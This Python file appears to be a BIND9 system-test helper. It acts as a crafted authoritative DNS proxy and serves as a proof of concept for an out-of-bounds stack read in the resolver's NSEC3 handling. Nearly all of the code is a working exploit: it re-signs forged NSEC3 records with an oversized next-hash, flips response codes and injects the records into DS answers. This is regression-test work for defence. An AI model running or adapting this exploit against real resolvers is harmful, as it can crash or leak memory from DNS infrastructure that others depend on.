1 #!/usr/bin/env python3 2 # Copyright (C) Internet Systems Consortium, Inc. ("ISC") 3 # 4 # SPDX-License-Identifier: MPL-2.0 5 # 6 # This Source Code Form is subject to the terms of the Mozilla Public 7 # License, v. 2.0. If a copy of the MPL was not distributed with this 8 # file, you can obtain one at https://mozilla.org/MPL/2.0/. 9 # 10 # See the COPYRIGHT file distributed with this work for additional 11 # information regarding copyright ownership. 12 13 """ 14 Crafted authoritative DNS proxy for BIND9 NSEC3 OOB read PoC. 15 16 Simulates a malicious authoritative server that crafts NSEC3 responses 17 to trigger CWE-125 (out-of-bounds stack read) in validator.c:344. 18 19 Attack chain: 20 1. Resolver queries xxx.evil.test A -> proxy modifies NSEC3 in A response 21 (breaks the NSEC3 proof, forcing proveunsecure() fallback) 22 2. Resolver fetches DS for xxx.evil.test -> proxy injects crafted NSEC3 23 with next_length=200 (exceeds 155-byte buffer) at position 0 24 3. DS validation succeeds via unmodified NSEC3 (opt-out coverage) 25 4. ncache stores: [crafted_nsec3 (200B next), original_nsec3] 26 5. isdelegation() iterates ncache -> crafted first -> memcmp() OOB read 27 28 Usage: python3 crafted_auth_v6.py <ip> <port> 29 Listens on [ip]:[port] 30 Forwards to legitimate auth server on [10.53.0.6]:[port] 31 32 Prerequisites: pip install dnspython cryptography 33 """ 34 35 import base64 36 import glob 37 import os 38 import signal 39 import socket 40 import struct 41 import sys 42 import time 43 44 from cryptography.hazmat.backends import default_backend 45 from cryptography.hazmat.primitives import hashes 46 from cryptography.hazmat.primitives.asymmetric import ec, utils 47 48 import dns.message 49 import dns.name 50 import dns.rcode 51 import dns.rdata 52 import dns.rdataclass 53 import dns.rdatatype 54 import dns.rrset 55 56 IP = sys.argv[1] 57 PORT = int(sys.argv[2]) 58 TARGET_NEXT_LENGTH = 200 59 ZONE_FILE = "../ns6/evil.test.db.signed" 60 61 # NSEC3 params: alg=1(SHA1), flags=1(opt-out), iterations=10, salt=DEADBEEF 62 NSEC3_ALG = 1 63 NSEC3_FLAGS = 1 64 NSEC3_ITERATIONS = 10 65 NSEC3_SALT = bytes.fromhex("DEADBEEF") 66 NSEC3_TTL = 86400 67 68 # RRSIG timing: computed dynamically for portability 69 NOW = int(time.time()) 70 RRSIG_LABELS = 3 71 RRSIG_ORIG_TTL = 86400 72 RRSIG_INCEPTION = NOW - 3600 # 1 hour ago 73 RRSIG_EXPIRATION = NOW + 30 * 86400 # 30 days from now 74 75 76 def discover_nsec3_from_zone(zone_file): 77 """ 78 Auto-discover NSEC3 owner names and next hashes from the signed zone. 79 Returns list of dicts sorted by owner name. 80 """ 81 nsec3_records = [] 82 with open(zone_file, "r", encoding="utf-8") as f: 83 for line in f: 84 line = line.strip() 85 if not line or line.startswith(";"): 86 continue 87 parts = line.split() 88 if parts[3] == "NSEC3": 89 print(parts) 90 try: 91 idx = parts.index("NSEC3") 92 print(idx) 93 owner = parts[0] 94 next_hash_b32 = parts[idx + 5] 95 flags = int(parts[idx + 2]) 96 nsec3_records.append( 97 { 98 "owner": owner, 99 "next_hash_b32": next_hash_b32, 100 "flags": flags, 101 } 102 ) 103 except (IndexError, ValueError): 104 continue 105 nsec3_records.sort(key=lambda r: r["owner"]) 106 return nsec3_records 107 108 109 def b32_to_bytes(b32hex_str): 110 """Decode base32hex (RFC 4648) to bytes.""" 111 padded = b32hex_str.upper() + "=" * ((8 - len(b32hex_str) % 8) % 8) 112 return base64.b32hexdecode(padded) 113 114 115 def load_zsk(): 116 """Load the Zone Signing Key (ZSK) for re-signing modified records.""" 117 keys = glob.glob("../ns6/Kevil.test.+013+*.private") 118 for kf in keys: 119 pub = kf.replace(".private", ".key") 120 with open(pub, "r", encoding="utf-8") as f: 121 content = f.read() 122 if "256 3 13" in content: 123 with open(kf, "r", encoding="utf-8") as pf: 124 for line in pf: 125 if line.startswith("PrivateKey:"): 126 key_bytes = base64.b64decode(line.split(":", 1)[1].strip()) 127 pk = ec.derive_private_key( 128 int.from_bytes(key_bytes, "big"), 129 ec.SECP256R1(), 130 default_backend(), 131 ) 132 tag = int(kf.split("+")[-1].replace(".private", "")) 133 print(f"[*] Loaded ZSK key tag={tag}", flush=True) 134 return pk, tag 135 raise ValueError("No ZSK found") 136 137 138 def sign_rrset( 139 private_key, 140 key_tag, 141 rrset, 142 type_covered, 143 labels, 144 original_ttl, 145 expiration, 146 inception, 147 signer_name, 148 ): 149 """Sign an RRset with ECDSAP256SHA256 and return RRSIG rdata.""" 150 algorithm = 13 151 152 sig_rdata = struct.pack("!HBBI", type_covered, algorithm, labels, original_ttl) 153 sig_rdata += struct.pack("!II", expiration, inception) 154 sig_rdata += struct.pack("!H", key_tag) 155 sig_rdata += signer_name.canonicalize().to_wire() 156 157 rr_wires = [] 158 for rdata in rrset: 159 rdata_wire = rdata.to_digestable() 160 rr_wire = rrset.name.canonicalize().to_wire() 161 rr_wire += struct.pack("!HHI", rrset.rdtype, rrset.rdclass, original_ttl) 162 rr_wire += struct.pack("!H", len(rdata_wire)) 163 rr_wire += rdata_wire 164 rr_wires.append(rr_wire) 165 166 rr_wires.sort() 167 sign_data = sig_rdata + b"".join(rr_wires) 168 169 der_sig = private_key.sign(sign_data, ec.ECDSA(hashes.SHA256())) 170 r, s = utils.decode_dss_signature(der_sig) 171 raw_sig = r.to_bytes(32, "big") + s.to_bytes(32, "big") 172 173 full_rrsig_wire = sig_rdata + raw_sig 174 rrsig_rdata = dns.rdata.from_wire( 175 dns.rdataclass.IN, 176 dns.rdatatype.RRSIG, 177 full_rrsig_wire, 178 0, 179 len(full_rrsig_wire), 180 None, 181 ) 182 return rrsig_rdata 183 184 185 def sign_rrset_from_template(private_key, key_tag, rrset, template_rrsig): 186 """Sign using existing RRSIG as template for type_covered.""" 187 return sign_rrset( 188 private_key, 189 key_tag, 190 rrset, 191 template_rrsig.type_covered, 192 RRSIG_LABELS, 193 RRSIG_ORIG_TTL, 194 RRSIG_EXPIRATION, 195 RRSIG_INCEPTION, 196 template_rrsig.signer, 197 ) 198 199 200 def build_crafted_nsec3(private_key, key_tag, owner_name, original_next_hash, bitmaps): 201 """ 202 Build a crafted NSEC3 with next_length=200 (exceeds 155-byte buffer). 203 Returns (nsec3_rrset, rrsig_rrset). 204 """ 205 name = dns.name.from_text(owner_name) 206 signer = dns.name.from_text("evil.test.") 207 208 crafted_next = original_next_hash + os.urandom( 209 TARGET_NEXT_LENGTH - len(original_next_hash) 210 ) 211 212 nsec3_wire = struct.pack("!BBH", NSEC3_ALG, NSEC3_FLAGS, NSEC3_ITERATIONS) 213 nsec3_wire += struct.pack("!B", len(NSEC3_SALT)) + NSEC3_SALT 214 nsec3_wire += struct.pack("!B", TARGET_NEXT_LENGTH) + crafted_next 215 nsec3_wire += bitmaps 216 217 nsec3_rdata = dns.rdata.from_wire( 218 dns.rdataclass.IN, dns.rdatatype.NSEC3, nsec3_wire, 0, len(nsec3_wire), None 219 ) 220 221 nsec3_rrset = dns.rrset.RRset(name, dns.rdataclass.IN, dns.rdatatype.NSEC3) 222 nsec3_rrset.update_ttl(NSEC3_TTL) 223 nsec3_rrset.add(nsec3_rdata) 224 225 rrsig_rdata = sign_rrset( 226 private_key, 227 key_tag, 228 nsec3_rrset, 229 type_covered=dns.rdatatype.NSEC3, 230 labels=RRSIG_LABELS, 231 original_ttl=RRSIG_ORIG_TTL, 232 expiration=RRSIG_EXPIRATION, 233 inception=RRSIG_INCEPTION, 234 signer_name=signer, 235 ) 236 237 rrsig_rrset = dns.rrset.RRset(name, dns.rdataclass.IN, dns.rdatatype.RRSIG) 238 rrsig_rrset.update_ttl(NSEC3_TTL) 239 rrsig_rrset.add(rrsig_rdata) 240 241 print( 242 f"[*] Built crafted NSEC3: owner={owner_name}, " 243 f"next_hash={TARGET_NEXT_LENGTH}B, signed tag={key_tag}", 244 flush=True, 245 ) 246 return nsec3_rrset, rrsig_rrset 247 248 249 def modify_nsec3_next(rdata): 250 """Modify an NSEC3 record's next_hash to TARGET_NEXT_LENGTH bytes.""" 251 orig_wire = rdata.to_digestable() 252 pos = 0 253 hash_alg = orig_wire[pos] 254 pos += 1 255 flags = orig_wire[pos] 256 pos += 1 257 iterations = struct.unpack("!H", orig_wire[pos : pos + 2])[0] 258 pos += 2 259 salt_len = orig_wire[pos] 260 pos += 1 261 salt = orig_wire[pos : pos + salt_len] 262 pos += salt_len 263 hash_len = orig_wire[pos] 264 pos += 1 265 next_hash = orig_wire[pos : pos + hash_len] 266 pos += hash_len 267 type_bitmaps = orig_wire[pos:] 268 269 crafted_next = next_hash + os.urandom(TARGET_NEXT_LENGTH - len(next_hash)) 270 new_wire = struct.pack("!BBH", hash_alg, flags, iterations) 271 new_wire += struct.pack("!B", salt_len) + salt 272 new_wire += struct.pack("!B", TARGET_NEXT_LENGTH) + crafted_next 273 new_wire += type_bitmaps 274 275 return dns.rdata.from_wire( 276 dns.rdataclass.IN, dns.rdatatype.NSEC3, new_wire, 0, len(new_wire), None 277 ) 278 279 280 def name_label(name): 281 """Get the first label (NSEC3 hash) from a DNS name.""" 282 return str(name).split(".", maxsplit=1)[0].upper() 283 284 285 def is_target(dns_name, target_prefix): 286 """Check if a DNS name's first label starts with target prefix.""" 287 return ( 288 str(dns_name) 289 .split(".", maxsplit=1)[0] 290 .upper() 291 .startswith(target_prefix.upper()) 292 ) 293 294 295 def patch_a_response(response_data, private_key, key_tag, modify_name): 296 """ 297 Patch A response: modify the NSEC3 matching modify_name to break 298 the NSEC3 proof, forcing the resolver into proveunsecure(). 299 """ 300 try: 301 msg = dns.message.from_wire(response_data) 302 except Exception as e: # pylint: disable=broad-except 303 print(f"[!] Parse error: {e}", flush=True) 304 return response_data 305 306 new_authority = [] 307 for rrset in msg.authority: 308 if rrset.rdtype == dns.rdatatype.NSEC3 and is_target(rrset.name, modify_name): 309 new_rrset = dns.rrset.RRset(rrset.name, rrset.rdclass, rrset.rdtype) 310 new_rrset.update_ttl(rrset.ttl) 311 for rdata in rrset: 312 new_rrset.add(modify_nsec3_next(rdata)) 313 new_authority.append(new_rrset) 314 print( 315 f"[!] PATCHED {name_label(rrset.name)}: " 316 f"next_hash -> {TARGET_NEXT_LENGTH}B", 317 flush=True, 318 ) 319 320 elif rrset.rdtype == dns.rdatatype.RRSIG: 321 covers_nsec3 = any(rd.type_covered == dns.rdatatype.NSEC3 for rd in rrset) 322 if covers_nsec3 and is_target(rrset.name, modify_name): 323 target_rrset = [ 324 rs 325 for rs in new_authority 326 if rs.rdtype == dns.rdatatype.NSEC3 327 and is_target(rs.name, modify_name) 328 ] 329 if target_rrset: 330 template = next(iter(rrset)) 331 try: 332 new_rrsig = sign_rrset_from_template( 333 private_key, key_tag, target_rrset[0], template 334 ) 335 rrsig_rrset = dns.rrset.RRset( 336 rrset.name, dns.rdataclass.IN, dns.rdatatype.RRSIG 337 ) 338 rrsig_rrset.update_ttl(rrset.ttl) 339 rrsig_rrset.add(new_rrsig) 340 new_authority.append(rrsig_rrset) 341 print(f"[!] Re-signed " f"{name_label(rrset.name)}", flush=True) 342 except Exception as e: # pylint: disable=broad-except 343 print(f"[!] Sign error: {e}", flush=True) 344 new_authority.append(rrset) 345 else: 346 new_authority.append(rrset) 347 else: 348 new_authority.append(rrset) 349 else: 350 new_authority.append(rrset) 351 352 msg.authority = new_authority 353 try: 354 wire = msg.to_wire() 355 print(f"[!] A response: {len(wire)} bytes", flush=True) 356 return wire 357 except Exception as e: # pylint: disable=broad-except 358 print(f"[!] Wire error: {e}", flush=True) 359 return response_data 360 361 362 def patch_ds_response(response_data, crafted_nsec3, crafted_rrsig, inject_name): 363 """ 364 Patch DS response: 365 - Change RCODE NXDOMAIN -> NOERROR 366 - Inject crafted NSEC3 (200B next) at position 0 in authority 367 """ 368 try: 369 msg = dns.message.from_wire(response_data) 370 except Exception as e: # pylint: disable=broad-except 371 print(f"[!] Parse error: {e}", flush=True) 372 return response_data 373 374 if msg.rcode() == dns.rcode.NXDOMAIN: 375 msg.set_rcode(dns.rcode.NOERROR) 376 print("[!] RCODE: NXDOMAIN -> NOERROR", flush=True) 377 378 new_authority = [crafted_nsec3, crafted_rrsig] 379 print( 380 "[!] INJECTED crafted " 381 f"{name_label(crafted_nsec3.name)} " 382 f"(next={TARGET_NEXT_LENGTH}B) at position 0", 383 flush=True, 384 ) 385 386 for rrset in msg.authority: 387 if is_target(rrset.name, inject_name): 388 print(f"[D] Skipped original " f"{name_label(rrset.name)}", flush=True) 389 continue 390 new_authority.append(rrset) 391 392 msg.authority = new_authority 393 try: 394 wire = msg.to_wire() 395 print(f"[!] DS response: {len(wire)} bytes", flush=True) 396 return wire 397 except Exception as e: # pylint: disable=broad-except 398 print(f"[!] Wire error: {e}", flush=True) 399 return response_data 400 401 402 def sigterm(*_): 403 print("SIGTERM received, shutting down") 404 os.remove("ans.pid") 405 sys.exit(0) 406 407 408 def main(): 409 signal.signal(signal.SIGTERM, sigterm) 410 signal.signal(signal.SIGINT, sigterm) 411 with open("ans.pid", "w", encoding="utf-8") as pidfile: 412 print(os.getpid(), file=pidfile) 413 414 # Auto-discover NSEC3 info from signed zone 415 print(f"[*] Reading zone file: {ZONE_FILE}", flush=True) 416 nsec3_records = discover_nsec3_from_zone(ZONE_FILE) 417 418 if len(nsec3_records) < 2: 419 print( 420 f"[!] ERROR: Need >= 2 NSEC3 records, " f"found {len(nsec3_records)}", 421 flush=True, 422 ) 423 sys.exit(1) 424 425 # First alphabetically = inject target, second = modify target 426 inject_rec = nsec3_records[0] 427 modify_rec = nsec3_records[1] 428 429 inject_name = inject_rec["owner"].split(".")[0] 430 modify_name = modify_rec["owner"].split(".")[0] 431 inject_owner_full = inject_rec["owner"] 432 inject_next_hash = b32_to_bytes(inject_rec["next_hash_b32"]) 433 434 inject_bitmaps = bytes.fromhex("0006400000000002") # A RRSIG 435 436 print(f"[*] NSEC3 to INJECT (crafted): {inject_name}", flush=True) 437 print(f"[*] NSEC3 to MODIFY (break proof): {modify_name}", flush=True) 438 439 # Load ZSK for re-signing 440 private_key, key_tag = load_zsk() 441 442 # Build crafted NSEC3 with next_length=200 443 crafted_nsec3, crafted_rrsig = build_crafted_nsec3( 444 private_key, key_tag, inject_owner_full, inject_next_hash, inject_bitmaps 445 ) 446 447 # Start UDP proxy 448 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 449 sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 450 sock.bind((IP, PORT)) 451 print(f"[*] Proxy on {IP}:{PORT} -> {IP}:{PORT}", flush=True) 452 453 while True: 454 data, addr = sock.recvfrom(4096) 455 try: 456 query = dns.message.from_wire(data) 457 qname = query.question[0].name 458 qtype = query.question[0].rdtype 459 qtype_text = dns.rdatatype.to_text(qtype) 460 print(f"\n[<] Query from {addr}: {qname} {qtype_text}", flush=True) 461 except Exception as e: # pylint: disable=broad-except 462 print(f"[<] Query parse error: {e}", flush=True) 463 qtype = None 464 465 fwd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 466 fwd.settimeout(3) 467 fwd.sendto(data, ("10.53.0.6", PORT)) 468 try: 469 response, _ = fwd.recvfrom(65535) 470 if qtype == dns.rdatatype.DS: 471 print("[>] DS - inject crafted + RCODE change", flush=True) 472 modified = patch_ds_response( 473 response, crafted_nsec3, crafted_rrsig, inject_name 474 ) 475 sock.sendto(modified, addr) 476 elif qtype in (dns.rdatatype.A, dns.rdatatype.AAAA): 477 print(f"[>] A - modify {modify_name}", flush=True) 478 modified = patch_a_response(response, private_key, key_tag, modify_name) 479 sock.sendto(modified, addr) 480 else: 481 print(f"[>] {qtype_text} - forwarding", flush=True) 482 sock.sendto(response, addr) 483 except Exception as e: # pylint: disable=broad-except 484 print(f"[!] Error: {e}", flush=True) 485 finally: 486 fwd.close() 487 488 489 if __name__ == "__main__": 490 main() 491